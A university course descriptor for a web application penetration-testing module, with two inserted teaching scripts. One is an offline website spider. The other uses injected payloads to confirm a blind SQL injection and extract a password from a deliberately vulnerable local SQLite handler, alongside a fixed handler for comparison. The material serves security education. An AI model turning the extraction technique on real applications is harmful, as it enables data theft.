Module Web Application Security PDF

This document provides information on the "Web Application Security" module. The 5 ECTS credit module aims to teach students how to assess a web application's security posture and demonstrate the impact of inadequate security. Students will learn about major web application flaws, exploitation techniques, and a repeatable process for finding flaws. The module covers topics like reconnaissance, vulnerability discovery, and exploitation. Assessment includes projects to perform reconnaissance and discovery/exploitation stages of a penetration test, and a final practical skills evaluation of a complete penetration test.

DFCS H3021: Web Application Security

Short Title: Web Application Security APPROVED

Full Title: Web Application Security

Module Code: DFCS H3021

ECTS credits: 5

NFQ Level: 7

Module Delivered in no programmes

Module Contributor: Mark Cummins

Module Description: Modern cyber defense requires a realistic and thorough understanding of web application security issues.
This module will enable students to capably assess a web application's security posture and convincingly
demonstrate the impact of inadequate security that plagues most organisations. Students will come to
understand major web application flaws and their exploitation and, most importantly, learn a field-tested and
repeatable process to consistently find these flaws and convey what they have learned to their
organisations.

Learning Outcomes:

On successful completion of this module the learner will be able to

1. Apply a detailed methodology to web application penetration tests.
2. Analyse the results from automated web testing tools to remove false positives and validate findings, and manually discover key web application flaws.
3. Analyse traffic between the client and the server application using proxy tools to find security issues within the client-side application code.
4. Create configurations and test payloads for other web attacks.

Page 1 of 3

Module Content & Assessment

Indicative Content

Overview of the web from a penetration tester's perspective

Exploring the various servers and clients. Discussion of the various web architectures. Discovering how session state works. Discussion of the different types of vulnerabilities. Defining a web application test scope and process. Defining types of penetration testing.

Reconnaissance and mapping

Discovering the infrastructure within the application. Identifying the machines and operating systems. SSL/TLS configurations and weaknesses. Exploring virtual hosting and its impact on testing. Learning methods to identify load balancers. Software configuration discovery. Exploring external information sources. Google hacking. Learning tools to spider a website. Scripting to automate web requests and spidering. Application flow charting. Relationship analysis within an application. JavaScript for the attacker.
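The spidering, software configuration discovery and relationship analysis topics listed above can be illustrated with a small crawler. The script below is an added example and is not part of the module descriptor or its recommended texts. It runs offline against a constructed in-memory site (the SITE dictionary and the hostname app.example.test are assumptions made for the example); replacing fetch() with a real HTTP client is all that is needed to point it at a host you are authorised to test.

```python
"""Spider a web application, fingerprint it from response headers, and chart
which pages link where and which query parameters each path accepts."""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SCOPE_HOST = "app.example.test"   # assumed in-scope host (constructed for the example)

# Constructed sample site: url -> (response headers, HTML body). Header values are
# illustrative only, not real software versions.
SITE = {
    "http://app.example.test/": (
        {"Server": "nginx", "Set-Cookie": "JSESSIONID=abc; Path=/"},
        "<html><body><a href='/login'>Login</a><a href='/products?id=1'>Products</a>"
        "<script src='/static/app.js'></script></body></html>"),
    "http://app.example.test/login": (
        {"Server": "nginx"},
        "<form action='/login' method='post'><input name='user'><input name='pass'></form>"
        "<a href='/'>Home</a>"),
    "http://app.example.test/products?id=1": (
        {"Server": "nginx", "X-Powered-By": "PHP/7.4"},
        "<a href='/products?id=2'>Next</a><a href='http://cdn.example.test/img.png'>img</a>"),
    "http://app.example.test/products?id=2": (
        {"Server": "nginx"}, "<a href='/login'>Login</a>"),
}


def fetch(url):
    """Return (headers, body). Reads the constructed dict here; in a real test
    this is an HTTP GET. Unknown paths behave like an empty 404 body."""
    return SITE.get(url, ({}, ""))


class LinkExtractor(HTMLParser):
    """Collect anchor hrefs, script srcs and form (method, action) pairs."""
    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "script" and a.get("src"):
            self.links.append(a["src"])
        elif tag == "form":
            self.forms.append((a.get("method", "get").upper(), a.get("action", "")))


def in_scope(url):
    return urlsplit(url).netloc == SCOPE_HOST


def spider(start):
    """Breadth-first crawl within scope. Returns (site_map, out_of_scope) where
    site_map is url -> {"links", "forms", "headers"} and out_of_scope holds URLs
    that were seen but deliberately never requested."""
    site_map, out_of_scope = {}, set()
    queue = deque([start])
    while queue:
        url = queue.popleft()
        if url in site_map:
            continue
        headers, body = fetch(url)
        parser = LinkExtractor()
        parser.feed(body)
        resolved = [urljoin(url, link) for link in parser.links]
        site_map[url] = {"links": resolved, "forms": parser.forms, "headers": headers}
        for link in resolved:
            if in_scope(link):
                queue.append(link)
            else:
                out_of_scope.add(link)
    return site_map, out_of_scope


def fingerprint(site_map):
    """Software configuration discovery: server/framework banners and the
    names of session cookies the application sets."""
    tech, cookies = set(), set()
    for info in site_map.values():
        headers = info["headers"]
        for key in ("Server", "X-Powered-By"):
            if key in headers:
                tech.add(headers[key])
        if "Set-Cookie" in headers:
            cookies.add(headers["Set-Cookie"].split("=", 1)[0])
    return tech, cookies


def parameters(site_map):
    """Relationship analysis: which query parameters does each path accept?
    These are the first candidates for injection testing later."""
    params = {}
    for url in site_map:
        parts = urlsplit(url)
        if parts.query:
            names = {pair.split("=", 1)[0] for pair in parts.query.split("&")}
            params.setdefault(parts.path, set()).update(names)
    return params


if __name__ == "__main__":
    site_map, skipped = spider("http://app.example.test/")
    for url, info in site_map.items():
        print(url, "->", info["links"], info["forms"])
    print("out of scope:", skipped)
    print("technology:", fingerprint(site_map))
    print("parameters:", parameters(site_map))
```

Keeping out-of-scope links in a separate set rather than silently dropping them matters in a real engagement: a CDN or third-party host that the target loads scripts from is part of the attack surface even when the rules of engagement forbid touching it.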

Vulnerability discovery
Web app vulnerabilities and manual verification techniques. Interception proxies. Information leakage and directory browsing. Username
harvesting. Command Injection. Directory traversal. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request
Forgery (CSRF). Session flaws. Logic attacks. API attacks. Data binding attacks. Automated web application scanners
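Learning outcome 2 asks for automated findings to be validated by hand. The script below is an added example, not code from the module, showing what that verification looks like for a blind SQL injection: a differential true/false test that separates a real finding from a false positive, followed by boolean-based extraction that proves impact. The application is a constructed in-memory SQLite lookup with two handlers, one deliberately vulnerable and one hardened; the table contents are sample data invented for the example.

```python
"""Verify a suspected boolean-based blind SQL injection and confirm the fix."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products(id INTEGER, name TEXT);
INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
CREATE TABLE users(name TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret');   -- constructed sample data
""")


def product_exists_vulnerable(product_id: str) -> bool:
    """Deliberately vulnerable: the request parameter is concatenated into SQL.
    The only observable is whether a product was found (a blind oracle)."""
    query = f"SELECT name FROM products WHERE id = {product_id}"
    return conn.execute(query).fetchone() is not None


def product_exists_fixed(product_id: str) -> bool:
    """Hardened: the value is bound as a parameter and never parsed as SQL.
    SQLite applies the column's numeric affinity, so '1' still matches id 1
    while any text that is not a plain number matches nothing."""
    row = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()
    return row is not None


def confirm_boolean_sqli(handler, base: str = "1") -> bool:
    """Manual validation of a scanner finding. A true condition must behave
    like the baseline and a false condition must differ; if both probes give
    the same answer the parameter is not injectable this way."""
    def probe(payload):
        try:
            return handler(payload)
        except sqlite3.Error:   # a syntax error is not evidence either way
            return False
    return probe(base) and probe(f"{base} AND 1=1") and not probe(f"{base} AND 1=2")


def extract_blind(handler, subquery: str, max_len: int = 16) -> str:
    """Boolean-based inference: recover the subquery's result one character at
    a time, binary-searching the code point so each character costs about
    seven requests instead of up to 128."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(...)) yields NULL past the end of the string, so the
            # comparison is false and the search converges on 0, ending extraction.
            condition = f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if handler(condition):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE name='admin'"
    for name, handler in (("vulnerable", product_exists_vulnerable),
                          ("fixed", product_exists_fixed)):
        injectable = confirm_boolean_sqli(handler)
        print(f"{name}: injectable={injectable}", end="")
        if injectable:
            print(f", extracted={extract_blind(handler, target)!r}")
        else:
            print()
```

The confirmation step is the part scanners get wrong most often: a parameter that returns the same page for any input will light up some tools' heuristics, yet it fails the true/false differential and belongs in the false-positive pile. Against the fixed handler every probe matches nothing, so both confirm_boolean_sqli and extract_blind come back empty.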

Exploitation

Exploring methods to zombify browsers. Discussing using zombies to port scan or attack internal networks. Exploring attack frameworks. Exploiting the vulnerabilities discovered. Leveraging attacks to gain access to the system. How to pivot attacks through a web application. Exploiting applications to steal cookies. Executing commands through web application vulnerabilities.

Indicative Assessment Breakdown %

Course Work Assessment %: 100.00%

Assessment Type               Assessment Description                                                Outcome addressed   % of total   Assessment Date
Project                       Perform reconnaissance and mapping stage of a web penetration test.   1,2                 25.00        Week 5
Project                       Perform discovery and exploitation stage of a web penetration test.   3,4                 25.00        Week 10
Practical/Skills Evaluation   Perform a complete web penetration test.                              1,2,3,4             50.00        Week 12

No Final Exam Assessment %

Indicative Reassessment Requirement

Coursework Only
This module is reassessed solely on the basis of re-submitted coursework. There is no repeat written examination.

ITB reserves the right to alter the nature and timings of assessment


Indicative Module Workload & Resources


Indicative Workload: Full Time

Frequency Indicative Average Weekly Learner Workload

Every Week 2.00

Every Week 2.00

Every Week 3.00

Indicative Workload: Part Time

Frequency Indicative Average Weekly Learner Workload

Every Week 2.00

Every Week 2.00

Every Week 3.00

Resources

Recommended Book Resources

Dafydd Stuttard, Marcus Pinto, The Web Application Hacker's Handbook, Wiley [ISBN: 1118026470]

Michal Zalewski, The Tangled Web, No Starch Press [ISBN: 1593273886]

Supplementary Book Resources

Bryan Sullivan, Vincent Liu, Web Application Security, A Beginner's Guide, McGraw-Hill Osborne Media [ISBN: 0071776168]

This module does not have any article/paper resources

Other Resources

Website: The Open Web Application Security Project (OWASP), https://www.owasp.org/
